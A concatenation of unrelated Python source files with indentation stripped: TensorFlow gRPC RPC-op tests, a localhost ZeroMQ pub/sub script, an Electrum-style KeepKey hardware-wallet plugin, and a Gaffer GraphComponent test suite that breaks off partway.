self.assertAllEqual(result_or.is_ok(), False)
error_code, _ = result_or.get_error()
self.assertAllEqual(error_code, errors.DEADLINE_EXCEEDED)
# Succeeds with reasonable timeout.
result_or = client.add(
constant_op.constant(20), constant_op.constant(30), timeout_in_ms=5000)
self.assertAllEqual(result_or.is_ok(), True)
def test_async_call_op_wrapper(self):
v = variables.Variable(initial_value=0, dtype=dtypes.int64)
@eager_def_function.function(
input_signature=[tensor_spec.TensorSpec([], dtypes.int64)])
def assign_add(a):
v.assign_add(a)
@eager_def_function.function(input_signature=[])
def read_var():
return v.value()
port = portpicker.pick_unused_port()
address = "localhost:{}".format(port)
server = rpc_ops.GrpcServer(address)
server.register("assign_add", assign_add)
server.register("read_var", read_var)
server.start()
client = rpc_ops.GrpcClient(address)
futures = []
for _ in range(10):
futures.append(
client.call("assign_add",
[variables.Variable(2, dtype=dtypes.int64)]))
for f in futures:
f.is_ok()
result_or = client.call(
"read_var", output_specs=[tensor_spec.TensorSpec([], dtypes.int64)])
self.assertAllEqual(result_or.is_ok(), True)
self.assertAllEqual(result_or.get_value(), [20])
def test_rpc_call_op_in_tf_function(self):
@eager_def_function.function(input_signature=[
tensor_spec.TensorSpec([], dtypes.int32),
tensor_spec.TensorSpec([], dtypes.int32)
])
def _remote_fn(a, b):
return math_ops.multiply(a, b)
port = portpicker.pick_unused_port()
address = "localhost:{}".format(port)
server_resource = rpc_ops.GrpcServer(address)
server_resource.register("remote_fn", _remote_fn)
server_resource.start()
client = rpc_ops.GrpcClient(address=address, name="test_client")
a = variables.Variable(2, dtype=dtypes.int32)
b = variables.Variable(3, dtype=dtypes.int32)
@eager_def_function.function
def call_fn():
result_or = client.call(
args=[a, b],
method_name="remote_fn",
output_specs=[tensor_spec.TensorSpec([], dtypes.int32)])
self.assertAllEqual(True, result_or.is_ok())
result = result_or.get_value()
self.assertEqual(len(result), 1) # Call returns a list(tensors)
# TODO(ishark): Shape for output tensor is unknown currently.
# Add attribute for capturing TensorSpec for output and enable
# check below:
# self.assertIsNotNone(result[0].shape.rank)
return result
self.assertAllEqual(call_fn(), [6])
def test_resource_deletion(self):
port = portpicker.pick_unused_port()
address = "localhost:{}".format(port)
server = rpc_ops.GrpcServer(address)
server_handle = server._server_handle
# Test Future resource deletion
v = variables.Variable(initial_value=0, dtype=dtypes.int64)
@eager_def_function.function(input_signature=[])
def read_var():
return v.value()
server.register("read_var", read_var)
server.start()
client = rpc_ops.GrpcClient(address)
client_handle = client._client_handle
# Check future resource deletion without calling get_value.
def _create_and_delete_rpc_future():
handle = client.call(
"read_var", output_specs=[tensor_spec.TensorSpec([], dtypes.int64)])
return handle._status_or
@eager_def_function.function
def _create_and_delete_rpc_future_fn():
handle = client.call(
"read_var", output_specs=[tensor_spec.TensorSpec([], dtypes.int64)])
return handle._status_or
for _ in range(2):
handle = _create_and_delete_rpc_future()
with self.assertRaises(errors.NotFoundError):
resource_variable_ops.destroy_resource_op(
handle, ignore_lookup_error=False)
for _ in range(2):
handle = _create_and_delete_rpc_future_fn()
with self.assertRaises(errors.NotFoundError):
resource_variable_ops.destroy_resource_op(
handle, ignore_lookup_error=False)
# Check future resource deletion with calling get_value.
def _create_and_delete_with_future():
handle = client.call(
"read_var", output_specs=[tensor_spec.TensorSpec([], dtypes.int64)])
status_or_handle = handle._status_or
handle.get_value()
return status_or_handle
# Check future resource deletion with calling get_value with tf.function.
@eager_def_function.function
def _create_and_delete_with_future_fn():
handle = client.call(
"read_var", output_specs=[tensor_spec.TensorSpec([], dtypes.int64)])
status_or_handle = handle._status_or
handle.get_value()
return status_or_handle
for _ in range(2):
resource_handle = _create_and_delete_with_future()
with self.assertRaises(errors.NotFoundError):
resource_variable_ops.destroy_resource_op(
resource_handle, ignore_lookup_error=False)
for _ in range(2):
resource_handle = _create_and_delete_with_future_fn()
with self.assertRaises(errors.NotFoundError):
resource_variable_ops.destroy_resource_op(
resource_handle, ignore_lookup_error=False)
# Test server client resource gets deleted.
del client
with self.assertRaises(errors.NotFoundError):
resource_variable_ops.destroy_resource_op(
client_handle, ignore_lookup_error=False)
# Test server server resource gets deleted.
del server
with self.assertRaises(errors.NotFoundError):
resource_variable_ops.destroy_resource_op(
server_handle, ignore_lookup_error=False)
def test_rpc_error(self):
v = variables.Variable(initial_value=0, dtype=dtypes.int64)
@eager_def_function.function(
input_signature=[tensor_spec.TensorSpec([], dtypes.int64)])
def assign_add(a):
v.assign_add(a)
@eager_def_function.function(input_signature=[])
def read_var():
return v.value()
port = portpicker.pick_unused_port()
address = "localhost:{}".format(port)
server = rpc_ops.GrpcServer(address)
server.register("assign_add", assign_add)
server.register("read_var", read_var)
server.start()
client = rpc_ops.GrpcClient(address, list_registered_methods=True)
# confirm it works as expected when arguments are passed.
result_or = client.call("assign_add",
[variables.Variable(2, dtype=dtypes.int64)])
self.assertAllEqual(result_or.is_ok(), True)
result_or = client.call(
"read_var", output_specs=[tensor_spec.TensorSpec([], dtypes.int64)])
self.assertAllEqual(result_or.is_ok(), True)
self.assertAllEqual(result_or.get_value(), [2])
result_or = client.assign_add(variables.Variable(2, dtype=dtypes.int64))
self.assertAllEqual(True, result_or.is_ok())
result_or = client.read_var()
self.assertAllEqual(True, result_or.is_ok())
self.assertAllEqual(result_or.get_value(), 4)
# Fails with invalid argument error when no arguments are passed.
result_or = client.call("assign_add")
self.assertAllEqual(result_or.is_ok(), False)
error_code, _ = result_or.get_error()
self.assertAllEqual(error_code, errors.INVALID_ARGUMENT)
def test_captured_inputs(self):
v = variables.Variable(initial_value=0, dtype=dtypes.int64)
@eager_def_function.function(
input_signature=[tensor_spec.TensorSpec([], dtypes.int64)])
def assign_add(a):
v.assign_add(a)
@eager_def_function.function(input_signature=[])
def read_var():
return v.value()
port = portpicker.pick_unused_port()
address = "localhost:{}".format(port)
server = rpc_ops.GrpcServer(address)
server.register("assign_add", assign_add)
server.register("read_var", read_var)
server.start()
client = rpc_ops.GrpcClient(address)
result_or = client.call("assign_add",
[variables.Variable(2, dtype=dtypes.int64)])
self.assertAllEqual(result_or.is_ok(), True)
result_or = client.call("assign_add",
[variables.Variable(2, dtype=dtypes.int64)])
self.assertAllEqual(result_or.is_ok(), True)
result_or = client.call(
"read_var", output_specs=[tensor_spec.TensorSpec([], dtypes.int64)])
self.assertAllEqual(result_or.is_ok(), True)
self.assertAllEqual(result_or.get_value(), [4])
def test_register_method_twice(self):
v = variables.Variable(initial_value=0, dtype=dtypes.int64)
@eager_def_function.function(
input_signature=[tensor_spec.TensorSpec([], dtypes.int64)])
def assign_add(a):
v.assign_add(a)
@eager_def_function.function(
input_signature=[tensor_spec.TensorSpec([], dtypes.int64)])
def assign(a):
v.assign(a)
port = portpicker.pick_unused_port()
address = "localhost:{}".format(port)
server = rpc_ops.GrpcServer(address)
server.register("assign", assign_add)
with self.assertRaisesRegex(errors.InvalidArgumentError,
"assign is already registered."):
# Reusing the same error name.
server.register("assign", assign)
def test_tf_function_register_without_input_signature(self):
v = variables.Variable(initial_value=0, dtype=dtypes.int64)
@eager_def_function.function
def assign(a):
v.assign(a)
port = portpicker.pick_unused_port()
address = "localhost:{}".format(port)
server = rpc_ops.GrpcServer(address)
with self.assertRaisesRegex(
ValueError, "Input signature not specified for the function."):
server.register("assign", assign)
# Register without input signature should work for functions without input
# args.
@eager_def_function.function
def read_var():
return v.value()
server.register("read_var", read_var)
def test_multi_device_resource(self):
elements = np.random.randint(100, size=[200])
with ops.device("/device:CPU:1"):
queue = data_flow_ops.FIFOQueue(200, dtypes.int64, shapes=[])
@eager_def_function.function()
def populate_queue():
queue.enqueue_many(elements)
queue.close()
with ops.device("/device:CPU:0"):
port = portpicker.pick_unused_port()
address = "localhost:{}".format(port)
server = rpc_ops.GrpcServer(address)
server.register("populate_queue", populate_queue)
server.start()
client = rpc_ops.GrpcClient(address, list_registered_methods=True)
client.populate_queue()
for e in elements:
self.assertAllEqual(e, queue.dequeue())
def test_queue_resource(self):
elements = np.random.randint(100, size=[200])
queue = data_flow_ops.FIFOQueue(200, dtypes.int64, shapes=[])
@eager_def_function.function()
def populate_queue():
queue.enqueue_many(elements)
queue.close()
port = portpicker.pick_unused_port()
address = "localhost:{}".format(port)
server = rpc_ops.GrpcServer(address)
server.register("populate_queue", populate_queue)
server.start()
client = rpc_ops.GrpcClient(address, list_registered_methods=True)
client.populate_queue()
for e in elements:
self.assertAllEqual(e, queue.dequeue())
def test_multi_device_resource_cpu(self):
with ops.device("/device:cpu:1"):
v = variables.Variable(initial_value=0, dtype=dtypes.int64)
@eager_def_function.function(
input_signature=[tensor_spec.TensorSpec([], dtypes.int64)])
def assign_add(a):
v.assign_add(a)
with ops.device("/device:CPU:0"):
port = portpicker.pick_unused_port()
address = "localhost:{}".format(port)
server = rpc_ops.GrpcServer(address)
server.register("assign_add", assign_add)
server.start()
client = rpc_ops.GrpcClient(address, list_registered_methods=True)
result_or = client.assign_add(variables.Variable(2, dtype=dtypes.int64))
self.assertAllEqual(result_or.is_ok(), True)
self.assertAllEqual(v, 2)
if __name__ == "__main__":
ops.enable_eager_execution()
test.main()
|
test12.py | import zmq
import random
import sys
import time
from threading import Thread
def server():
port = "5556"
if len(sys.argv) > 1:
port = sys.argv[1]
int(port)
context = zmq.Context()
socket = context.socket(zmq.PUB)
socket.bind("tcp://127.0.0.1:%s" % port)
while True:
socket.send(b'hi')
time.sleep(.2)
def client():
import sys
import zmq
port = "5556"
# Socket to talk to server_p
context = zmq.Context()
socket = context.socket(zmq.SUB)
#socket.setsockopt_unicode(zmq.SUBSCRIBE, "")
print("Collecting updates from weather server_p...")
socket.connect("tcp://127.0.0.1:%s" % port)
# Process 5 updates
total_value = 0
for update_nbr in range(5):
string = socket.recv()
print(string)
# print("Average messagedata value for topic '%s' was %dF" % (topicfilter, total_value / update_nbr))
t1 = Thread(target=server,name='s')
t2 = Thread(target=client,name='c')
t1.start()
t2.start() |
keepkey.py | from binascii import hexlify, unhexlify
import traceback
import sys
from typing import NamedTuple, Any, Optional, Dict, Union, List, Tuple, TYPE_CHECKING
from electrum_blk.util import bfh, bh2u, UserCancelled, UserFacingException
from electrum_blk.bip32 import BIP32Node
from electrum_blk import constants
from electrum_blk.i18n import _
from electrum_blk.transaction import Transaction, PartialTransaction, PartialTxInput, PartialTxOutput
from electrum_blk.keystore import Hardware_KeyStore
from electrum_blk.plugin import Device, runs_in_hwd_thread
from electrum_blk.base_wizard import ScriptTypeNotSupported
from ..hw_wallet import HW_PluginBase
from ..hw_wallet.plugin import (is_any_tx_output_on_change_branch, trezor_validate_op_return_output_and_get_data,
get_xpubs_and_der_suffixes_from_txinout)
if TYPE_CHECKING:
import usb1
from .client import KeepKeyClient
# TREZOR initialization methods
TIM_NEW, TIM_RECOVER, TIM_MNEMONIC, TIM_PRIVKEY = range(0, 4)
class KeepKey_KeyStore(Hardware_KeyStore):
hw_type = 'keepkey'
device = 'KeepKey'
plugin: 'KeepKeyPlugin'
def get_client(self, force_pair=True):
return self.plugin.get_client(self, force_pair)
def decrypt_message(self, sequence, message, password):
raise UserFacingException(_('Encryption and decryption are not implemented by {}').format(self.device))
@runs_in_hwd_thread
def sign_message(self, sequence, message, password, *, script_type=None):
client = self.get_client()
address_path = self.get_derivation_prefix() + "/%d/%d"%sequence
address_n = client.expand_path(address_path)
msg_sig = client.sign_message(self.plugin.get_coin_name(), address_n, message)
return msg_sig.signature
@runs_in_hwd_thread
def sign_transaction(self, tx, password):
if tx.is_complete():
return
# previous transactions used as inputs
prev_tx = {}
for txin in tx.inputs():
tx_hash = txin.prevout.txid.hex()
if txin.utxo is None and not txin.is_segwit():
raise UserFacingException(_('Missing previous tx for legacy input.'))
prev_tx[tx_hash] = txin.utxo
self.plugin.sign_transaction(self, tx, prev_tx)
class KeepKeyPlugin(HW_PluginBase):
# Derived classes provide:
#
# class-static variables: client_class, firmware_URL, handler_class,
# libraries_available, libraries_URL, minimum_firmware,
# wallet_class, ckd_public, types, HidTransport
firmware_URL = 'https://www.keepkey.com'
libraries_URL = 'https://github.com/keepkey/python-keepkey'
minimum_firmware = (1, 0, 0)
keystore_class = KeepKey_KeyStore
SUPPORTED_XTYPES = ('standard', 'p2wpkh-p2sh', 'p2wpkh', 'p2wsh-p2sh', 'p2wsh')
MAX_LABEL_LEN = 32
def __init__(self, parent, config, name):
HW_PluginBase.__init__(self, parent, config, name)
try:
from . import client
import keepkeylib
import keepkeylib.ckd_public
import keepkeylib.transport_hid
import keepkeylib.transport_webusb
self.client_class = client.KeepKeyClient
self.ckd_public = keepkeylib.ckd_public
self.types = keepkeylib.client.types
self.DEVICE_IDS = (keepkeylib.transport_hid.DEVICE_IDS +
keepkeylib.transport_webusb.DEVICE_IDS)
# only "register" hid device id:
self.device_manager().register_devices(keepkeylib.transport_hid.DEVICE_IDS, plugin=self)
# for webusb transport, use custom enumerate function:
self.device_manager().register_enumerate_func(self.enumerate)
self.libraries_available = True
except ImportError:
self.libraries_available = False
@runs_in_hwd_thread
def enumerate(self):
from keepkeylib.transport_webusb import WebUsbTransport
results = []
for dev in WebUsbTransport.enumerate():
path = self._dev_to_str(dev)
results.append(Device(path=path,
interface_number=-1,
id_=path,
product_key=(dev.getVendorID(), dev.getProductID()),
usage_page=0,
transport_ui_string=f"webusb:{path}"))
return results
@staticmethod
def _dev_to_str(dev: "usb1.USBDevice") -> str:
return ":".join(str(x) for x in ["%03i" % (dev.getBusNumber(),)] + dev.getPortNumberList())
@runs_in_hwd_thread
def hid_transport(self, pair):
from keepkeylib.transport_hid import HidTransport
return HidTransport(pair)
@runs_in_hwd_thread
def webusb_transport(self, device):
from keepkeylib.transport_webusb import WebUsbTransport
for dev in WebUsbTransport.enumerate():
if device.path == self._dev_to_str(dev):
return WebUsbTransport(dev)
@runs_in_hwd_thread
def _try_hid(self, device):
self.logger.info("Trying to connect over USB...")
if device.interface_number == 1:
pair = [None, device.path]
else:
pair = [device.path, None]
try:
return self.hid_transport(pair)
except BaseException as e:
# see fdb810ba622dc7dbe1259cbafb5b28e19d2ab114
# raise
self.logger.info(f"cannot connect at {device.path} {e}")
return None
@runs_in_hwd_thread
def _try_webusb(self, device):
self.logger.info("Trying to connect over WebUSB...")
try:
return self.webusb_transport(device)
except BaseException as e:
self.logger.info(f"cannot connect at {device.path} {e}")
return None
@runs_in_hwd_thread
def create_client(self, device, handler):
if device.product_key[1] == 2:
transport = self._try_webusb(device)
else:
transport = self._try_hid(device)
if not transport:
self.logger.info("cannot connect to device")
return
self.logger.info(f"connected to device at {device.path}")
client = self.client_class(transport, handler, self)
# Try a ping for device sanity
try:
client.ping('t')
except BaseException as e:
self.logger.info(f"ping failed {e}")
return None
if not client.atleast_version(*self.minimum_firmware):
msg = (_('Outdated {} firmware for device labelled {}. Please '
'download the updated firmware from {}')
.format(self.device, client.label(), self.firmware_URL))
self.logger.info(msg)
if handler:
handler.show_error(msg)
else:
raise UserFacingException(msg)
return None
return client
@runs_in_hwd_thread
def get_client(self, keystore, force_pair=True, *,
devices=None, allow_user_interaction=True) -> Optional['KeepKeyClient']:
client = super().get_client(keystore, force_pair,
devices=devices,
allow_user_interaction=allow_user_interaction)
# returns the client for a given keystore. can use xpub
if client:
client.used()
return client
def get_coin_name(self):
return "Testnet" if constants.net.TESTNET else "Blackcoin"
def initialize_device(self, device_id, wizard, handler):
# Initialization method
msg = _("Choose how you want to initialize your {}.\n\n"
"The first two methods are secure as no secret information "
"is entered into your computer.\n\n"
"For the last two methods you input secrets on your keyboard "
"and upload them to your {}, and so you should "
"only do those on a computer you know to be trustworthy "
"and free of malware."
).format(self.device, self.device)
choices = [
# Must be short as QT doesn't word-wrap radio button text
(TIM_NEW, _("Let the device generate a completely new seed randomly")),
(TIM_RECOVER, _("Recover from a seed you have previously written down")),
(TIM_MNEMONIC, _("Upload a BIP39 mnemonic to generate the seed")),
(TIM_PRIVKEY, _("Upload a master private key"))
]
def f(method):
import threading
settings = self.request_trezor_init_settings(wizard, method, self.device)
t = threading.Thread(target=self._initialize_device_safe, args=(settings, method, device_id, wizard, handler))
t.setDaemon(True)
t.start()
exit_code = wizard.loop.exec_()
if exit_code != 0:
# this method (initialize_device) was called with the expectation
# of leaving the device in an initialized state when finishing.
# signal that this is not the case:
raise UserCancelled()
wizard.choice_dialog(title=_('Initialize Device'), message=msg, choices=choices, run_next=f)
def _initialize_device_safe(self, settings, method, device_id, wizard, handler):
exit_code = 0
try:
self._initialize_device(settings, method, device_id, wizard, handler)
except UserCancelled:
exit_code = 1
except BaseException as e:
self.logger.exception('')
handler.show_error(repr(e))
exit_code = 1
finally:
wizard.loop.exit(exit_code)
@runs_in_hwd_thread
def _initialize_device(self, settings, method, device_id, wizard, handler):
item, label, pin_protection, passphrase_protection = settings
language = 'english'
devmgr = self.device_manager()
client = devmgr.client_by_id(device_id)
if not client:
raise Exception(_("The device was disconnected."))
if method == TIM_NEW:
strength = 64 * (item + 2) # 128, 192 or 256
client.reset_device(True, strength, passphrase_protection,
pin_protection, label, language)
elif method == TIM_RECOVER:
word_count = 6 * (item + 2) # 12, 18 or 24
client.step = 0
client.recovery_device(word_count, passphrase_protection,
pin_protection, label, language)
elif method == TIM_MNEMONIC:
pin = pin_protection # It's the pin, not a boolean
client.load_device_by_mnemonic(str(item), pin,
passphrase_protection,
label, language)
else:
pin = pin_protection # It's the pin, not a boolean
client.load_device_by_xprv(item, pin, passphrase_protection,
label, language)
def _make_node_path(self, xpub, address_n):
bip32node = BIP32Node.from_xkey(xpub)
node = self.types.HDNodeType(
depth=bip32node.depth,
fingerprint=int.from_bytes(bip32node.fingerprint, 'big'),
child_num=int.from_bytes(bip32node.child_number, 'big'),
chain_code=bip32node.chaincode,
public_key=bip32node.eckey.get_public_key_bytes(compressed=True),
)
return self.types.HDNodePathType(node=node, address_n=address_n)
def setup_device(self, device_info, wizard, purpose):
device_id = device_info.device.id_
client = self.scan_and_create_client_for_device(device_id=device_id, wizard=wizard)
if not device_info.initialized:
self.initialize_device(device_id, wizard, client.handler)
wizard.run_task_without_blocking_gui(
task=lambda: client.get_xpub("m", 'standard'))
client.used()
return client
def get_xpub(self, device_id, derivation, xtype, wizard):
if xtype not in self.SUPPORTED_XTYPES:
raise ScriptTypeNotSupported(_('This type of script is not supported with {}.').format(self.device))
client = self.scan_and_create_client_for_device(device_id=device_id, wizard=wizard)
xpub = client.get_xpub(derivation, xtype)
client.used()
return xpub
def get_keepkey_input_script_type(self, electrum_txin_type: str):
if electrum_txin_type in ('p2wpkh', 'p2wsh'):
return self.types.SPENDWITNESS
if electrum_txin_type in ('p2wpkh-p2sh', 'p2wsh-p2sh'):
return self.types.SPENDP2SHWITNESS
if electrum_txin_type in ('p2pkh',):
return self.types.SPENDADDRESS
if electrum_txin_type in ('p2sh',):
return self.types.SPENDMULTISIG
raise ValueError('unexpected txin type: {}'.format(electrum_txin_type))
def get_keepkey_output_script_type(self, electrum_txin_type: str):
if electrum_txin_type in ('p2wpkh', 'p2wsh'):
return self.types.PAYTOWITNESS
if electrum_txin_type in ('p2wpkh-p2sh', 'p2wsh-p2sh'):
return self.types.PAYTOP2SHWITNESS
if electrum_txin_type in ('p2pkh',):
return self.types.PAYTOADDRESS
if electrum_txin_type in ('p2sh',):
return self.types.PAYTOMULTISIG
raise ValueError('unexpected txin type: {}'.format(electrum_txin_type))
@runs_in_hwd_thread
def sign_transaction(self, keystore, tx: PartialTransaction, prev_tx):
self.prev_tx = prev_tx
client = self.get_client(keystore)
inputs = self.tx_inputs(tx, for_sig=True, keystore=keystore)
outputs = self.tx_outputs(tx, keystore=keystore)
signatures = client.sign_tx(self.get_coin_name(), inputs, outputs,
lock_time=tx.locktime, version=tx.version)[0]
signatures = [(bh2u(x) + '01') for x in signatures]
tx.update_signatures(signatures)
@runs_in_hwd_thread
def show_address(self, wallet, address, keystore=None):
if keystore is None:
keystore = wallet.get_keystore()
if not self.show_address_helper(wallet, address, keystore):
return
client = self.get_client(keystore)
if not client.atleast_version(1, 3):
keystore.handler.show_error(_("Your device firmware is too old"))
return
deriv_suffix = wallet.get_address_index(address)
derivation = keystore.get_derivation_prefix()
address_path = "%s/%d/%d"%(derivation, *deriv_suffix)
address_n = client.expand_path(address_path)
script_type = self.get_keepkey_input_script_type(wallet.txin_type)
# prepare multisig, if available:
xpubs = wallet.get_master_public_keys()
if len(xpubs) > 1:
pubkeys = wallet.get_public_keys(address)
# sort xpubs using the order of pubkeys
sorted_pairs = sorted(zip(pubkeys, xpubs))
multisig = self._make_multisig(
wallet.m,
[(xpub, deriv_suffix) for pubkey, xpub in sorted_pairs])
else:
multisig = None
client.get_address(self.get_coin_name(), address_n, True, multisig=multisig, script_type=script_type)
def tx_inputs(self, tx: Transaction, *, for_sig=False, keystore: 'KeepKey_KeyStore' = None):
inputs = []
for txin in tx.inputs():
txinputtype = self.types.TxInputType()
if txin.is_coinbase_input():
prev_hash = b"\x00"*32
prev_index = 0xffffffff # signed int -1
else:
if for_sig:
assert isinstance(tx, PartialTransaction)
assert isinstance(txin, PartialTxInput)
assert keystore
if len(txin.pubkeys) > 1:
xpubs_and_deriv_suffixes = get_xpubs_and_der_suffixes_from_txinout(tx, txin)
multisig = self._make_multisig(txin.num_sig, xpubs_and_deriv_suffixes)
else:
multisig = None
script_type = self.get_keepkey_input_script_type(txin.script_type)
txinputtype = self.types.TxInputType(
script_type=script_type,
multisig=multisig)
my_pubkey, full_path = keystore.find_my_pubkey_in_txinout(txin)
if full_path:
txinputtype.address_n.extend(full_path)
prev_hash = txin.prevout.txid
prev_index = txin.prevout.out_idx
if txin.value_sats() is not None:
txinputtype.amount = txin.value_sats()
txinputtype.prev_hash = prev_hash
txinputtype.prev_index = prev_index
if txin.script_sig is not None:
txinputtype.script_sig = txin.script_sig
txinputtype.sequence = txin.nsequence
inputs.append(txinputtype)
return inputs
def _make_multisig(self, m, xpubs):
if len(xpubs) == 1:
return None
pubkeys = [self._make_node_path(xpub, deriv) for xpub, deriv in xpubs]
return self.types.MultisigRedeemScriptType(
pubkeys=pubkeys,
signatures=[b''] * len(pubkeys),
m=m)
def tx_outputs(self, tx: PartialTransaction, *, keystore: 'KeepKey_KeyStore'):
def create_output_by_derivation():
script_type = self.get_keepkey_output_script_type(txout.script_type)
if len(txout.pubkeys) > 1:
xpubs_and_deriv_suffixes = get_xpubs_and_der_suffixes_from_txinout(tx, txout)
multisig = self._make_multisig(txout.num_sig, xpubs_and_deriv_suffixes)
else:
multisig = None
my_pubkey, full_path = keystore.find_my_pubkey_in_txinout(txout)
assert full_path
txoutputtype = self.types.TxOutputType(
multisig=multisig,
amount=txout.value,
address_n=full_path,
script_type=script_type)
return txoutputtype
def create_output_by_address():
txoutputtype = self.types.TxOutputType()
txoutputtype.amount = txout.value
if address:
txoutputtype.script_type = self.types.PAYTOADDRESS
txoutputtype.address = address
else:
txoutputtype.script_type = self.types.PAYTOOPRETURN
txoutputtype.op_return_data = trezor_validate_op_return_output_and_get_data(txout)
return txoutputtype
outputs = []
has_change = False
any_output_on_change_branch = is_any_tx_output_on_change_branch(tx)
for txout in tx.outputs():
address = txout.address
use_create_by_derivation = False
if txout.is_mine and not has_change:
# prioritise hiding outputs on the 'change' branch from user
# because no more than one change address allowed
if txout.is_change == any_output_on_change_branch:
use_create_by_derivation = True
has_change = True
if use_create_by_derivation:
txoutputtype = create_output_by_derivation()
else:
txoutputtype = create_output_by_address()
outputs.append(txoutputtype)
return outputs
def electrum_tx_to_txtype(self, tx: Optional[Transaction]):
t = self.types.TransactionType()
if tx is None:
# probably for segwit input and we don't need this prev txn
return t
tx.deserialize()
t.version = tx.version
t.lock_time = tx.locktime
inputs = self.tx_inputs(tx)
t.inputs.extend(inputs)
for out in tx.outputs():
o = t.bin_outputs.add()
o.amount = out.value
o.script_pubkey = out.scriptpubkey
return t
# This function is called from the TREZOR libraries (via tx_api)
def get_tx(self, tx_hash):
tx = self.prev_tx[tx_hash]
return self.electrum_tx_to_txtype(tx)
|
GraphComponentTest.py | ##########################################################################
#
# Copyright (c) 2011-2012, John Haddon. All rights reserved.
# Copyright (c) 2011-2013, Image Engine Design Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above
# copyright notice, this list of conditions and the following
# disclaimer.
#
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided with
# the distribution.
#
# * Neither the name of John Haddon nor the names of
# any other contributors to this software may be used to endorse or
# promote products derived from this software without specific prior
# written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS
# IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
##########################################################################
import gc
import weakref
import unittest
import threading
import Queue
import IECore
import Gaffer
import GafferTest
class GraphComponentTest( GafferTest.TestCase ) :
def testName( self ) :
c = Gaffer.GraphComponent()
self.assertEqual( c.getName(), "GraphComponent" )
self.assertEqual( c.fullName(), "GraphComponent" )
def f( c ) :
GraphComponentTest.name = c.getName()
con = c.nameChangedSignal().connect( f )
GraphComponentTest.name = "xxx"
c.setName( "newName" )
self.assertEqual( GraphComponentTest.name, "newName" )
# slot shouldn't be called this time, as the name
# doesn't change (it's the same value)
c.setName( "newName" )
self.assertEqual( self.name, "newName" )
self.assertEqual( c.getName(), "newName" )
child1 = Gaffer.GraphComponent()
child2 = Gaffer.GraphComponent()
self.assertEqual( child1.getName(), "GraphComponent" )
self.assertEqual( child2.getName(), "GraphComponent" )
self.assertEqual( child1.fullName(), "GraphComponent" )
self.assertEqual( child2.fullName(), "GraphComponent" )
c.addChild( child1 )
self.assertEqual( child1.getName(), "GraphComponent" )
self.assertEqual( child1.fullName(), "newName.GraphComponent" )
con = child2.nameChangedSignal().connect( f )
GraphComponentTest.name = "xxx"
c.addChild( child2 )
self.assertEqual( child2.getName(), "GraphComponent1" )
self.assertEqual( child2.fullName(), "newName.GraphComponent1" )
self.assertEqual( child2.relativeName( None ), "newName.GraphComponent1" )
self.assertEqual( child2.relativeName( c ), "GraphComponent1" )
self.assertEqual( GraphComponentTest.name, "GraphComponent1" )
def testParenting( self ) :
parent1 = Gaffer.GraphComponent()
self.assert_( parent1.parent() is None )
self.assertEqual( len( parent1.children() ), 0 )
child1 = Gaffer.GraphComponent()
self.assert_( child1.parent() is None )
self.assertEqual( len( child1.children() ), 0 )
parent1.addChild( child1 )
self.assert_( parent1.parent() is None )
self.assert_( parent1.getChild( "GraphComponent" ).isSame( child1 ) )
self.assert_( parent1["GraphComponent"].isSame( child1 ) )
self.assert_( child1.parent().isSame( parent1 ) )
parent1.removeChild( child1 )
self.assertEqual( parent1.children(), () )
self.assertEqual( child1.parent(), None )
self.assertRaises( RuntimeError, parent1.removeChild, child1 )
def testParentingSignals( self ) :
parent = Gaffer.GraphComponent()
child = Gaffer.GraphComponent()
def f( c, oldParent ) :
GraphComponentTest.newParent = c.parent()
GraphComponentTest.oldParent = oldParent
def ff( p, c ) :
GraphComponentTest.parenting = ( p, c )
c1 = child.parentChangedSignal().connect( f )
c2 = parent.childAddedSignal().connect( ff )
GraphComponentTest.newParent = None
GraphComponentTest.oldParent = None
GraphComponentTest.parenting = None
parent.addChild( child )
self.assert_( GraphComponentTest.newParent.isSame( parent ) )
self.assert_( GraphComponentTest.oldParent is None )
self.assert_( GraphComponentTest.parenting[0].isSame( parent ) )
self.assert_( GraphComponentTest.parenting[1].isSame( child ) )
GraphComponentTest.newParent = "xxx"
GraphComponentTest.oldParent = None
GraphComponentTest.parenting = None
c2 = parent.childRemovedSignal().connect( ff )
parent.removeChild( child )
self.assert_( GraphComponentTest.newParent is None )
self.assert_( GraphComponentTest.oldParent.isSame( parent ) )
self.assert_( GraphComponentTest.parenting[0].isSame( parent ) )
self.assert_( GraphComponentTest.parenting[1].isSame( child ) )
def testReparentingEmitsOnlyOneParentChangedSignal( self ) :
p1 = Gaffer.GraphComponent()
p2 = Gaffer.GraphComponent()
c = Gaffer.GraphComponent()
def f( child, previousParent ) :
GraphComponentTest.newParent = child.parent()
GraphComponentTest.oldParent = previousParent
GraphComponentTest.child = child
GraphComponentTest.numSignals += 1
GraphComponentTest.newParent = None
GraphComponentTest.oldParent = None
GraphComponentTest.child = None
GraphComponentTest.numSignals = 0
p1["c"] = c
connection = c.parentChangedSignal().connect( f )
p2["c"] = c
self.failUnless( GraphComponentTest.newParent.isSame( p2 ) )
self.failUnless( GraphComponentTest.oldParent.isSame( p1 ) )
self.failUnless( GraphComponentTest.child.isSame( c ) )
self.assertEqual( GraphComponentTest.numSignals, 1 )
def testParentChangedBecauseParentDied( self ) :
parent = Gaffer.GraphComponent()
child = Gaffer.GraphComponent()
parent["child"] = child
def f( child, previousParent ) :
GraphComponentTest.newParent = child.parent()
